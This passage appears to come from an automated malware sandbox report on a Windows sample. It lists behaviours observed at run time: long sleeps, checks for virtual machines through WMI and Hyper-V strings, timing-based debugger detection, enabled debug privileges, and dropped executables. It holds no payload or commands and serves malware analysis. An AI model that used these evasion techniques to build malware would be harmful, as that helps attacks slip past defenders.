Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Stalling execution: Execution stalls by calling Sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Memory allocated: 2A90000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033EB8B0 rdtsc

53_2_033EB8B0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5377	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4397	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Window / User API: threadDelayed 3826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Window / User API: threadDelayed 5991	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6833	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2772	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1079
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7702
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1742
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3986
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6175
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3508
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7246
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8466
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5961
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3763

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

API coverage: 7.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640	Thread sleep count: 5377 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640	Thread sleep count: 4397 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe TID: 6036	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe TID: 796	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6092	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep count: 6833 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep count: 2772 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 7772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep count: 1783 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828	Thread sleep count: 8429 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep count: 1079 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep count: 7702 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep count: 1742 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 5777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 3986 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep count: 7765 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep count: 1882 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep count: 6175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6868	Thread sleep count: 3508 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336	Thread sleep count: 8010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep count: 1591 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1244	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996	Thread sleep count: 7246 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2336	Thread sleep count: 2340 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 8466 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228	Thread sleep count: 915 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 5961 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 3763 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 7036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5168	Thread sleep count: 126 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5264	Thread sleep count: 44 > 30

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040AC68 FindFirstFileW,FindClose,	53_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	53_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C75E8 FindFirstFileA,	53_2_033C75E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C76C4 FindFirstFileA,GetLastError,	53_2_033C76C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C60F2 GetSystemInfo,

53_2_033C60F2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Source: NETSTAT.EXE, 00000040.00000002.2593027427.00000000033CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: svchost.exe, 00000007.00000002.2932740922.000002BE17659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2925637853.000002BE1202B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2925747202.000002BE12043000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: spkl.exe, 00000035.00000002.2958710472.000000000184E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: curl.exe, 0000000D.00000003.2045959683.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2045999780.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: spmm.exe, 00000049.00000002.2925038752.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli0Y
Source: curl.exe, 00000005.00000003.1700333845.000001295C1B6000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000006.00000002.1983125649.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715156517.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2766389640.0000000001798000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2745068935.0000000000C08000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768473168.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: spkl.exe, 00000035.00000002.2933829318.0000000001484000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@IdPORT_vmnet

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033EB8B0 rdtsc

53_2_033EB8B0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
